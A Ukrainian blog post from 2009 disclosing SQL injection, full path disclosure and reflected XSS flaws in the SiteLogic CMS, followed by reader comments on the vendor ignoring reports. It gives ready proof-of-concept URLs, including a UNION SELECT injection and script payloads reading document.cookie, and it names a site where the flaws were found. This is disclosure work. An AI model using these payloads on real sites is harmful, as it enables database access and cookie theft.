Уразливості в CMS SiteLogic
23:55 27.06.2009У березні, 03.03.2008, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості в CMS SiteLogic (це українська комерційна CMS). Уразливості виявив на сайті http://prp.org.ua. Про наявність уразливостей в їх CMS я неодноразово повідомляв розробникам CMS SiteLogic.
SQL Injection:
http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1
Full path disclosure:
http://site/index.php?mid=’
http://site/includes/stat.php
XSS:
http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Неділя, 23:04 28.06.2009
(це українська комерційна CMS)
sitelogic.ru =\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Неділя, 23:26 28.06.2009
poma
Про конструктор сайтів Sitelogic (sitelogic.ru) мені відомо, але до даної новини він не має жодного відношення. Я описав уразливості в CMS SiteLogic - українській комерційній CMS (як я чітко написав в новині). Це різні веб системи.
Я не став згадувати в новині назву розробника CMS SiteLogic, щоб не робити їм зайвий чорний PR . Особливо враховуючи, що за 1,5 роки я їм неодноразово повідомляв про дірки в їх системи, але вони їх так і не виправили (як цього досі не зробили й власники prp.org.ua, яким я також неодноразово повідомляв).
Якщо хочеш, то можеш спробувати знайти виробника CMS . Що легко зробити через вищезгаданий сайт prp.org.ua.
Понеділок, 11:25 29.06.2009
“Сайт розроблено компанією P**e****” (:
криві руки в розробників )
Понеділок, 18:55 29.06.2009
Так, саме цією компанією розроблений сайт і CMS . Для того я і зіслався в тексті на сайт prp.org.ua, щоб всі бажаючі змогли самі вияснити, що ж це за такий веселий розробник.
Є таке . До того ж ще й 1,5 роки наполегливо ігнорують мої попередження про дірки на їх сайті. І за рахунок дірявості своєї системи вони підставляють як себе (бо їх сайт також на цій CMS), так і всіх своїх клієнтів, що користуються даною CMS. Та й інших своїх клієнтів, що цією системою не користовуються (бо й сайти інших їхніх клієнтів також уразливі, як я перевірив).
Інші веб девелопери як в Україні, так і в світі, також активно займаються створенням дірок . Тому власникам сайтів, що самі розробляють свої сайти, або замовляють їх розробку у веб дизайн студій (як в Україні, так і в світі), варто завжди проводити аудит безпеки своїх сайтів.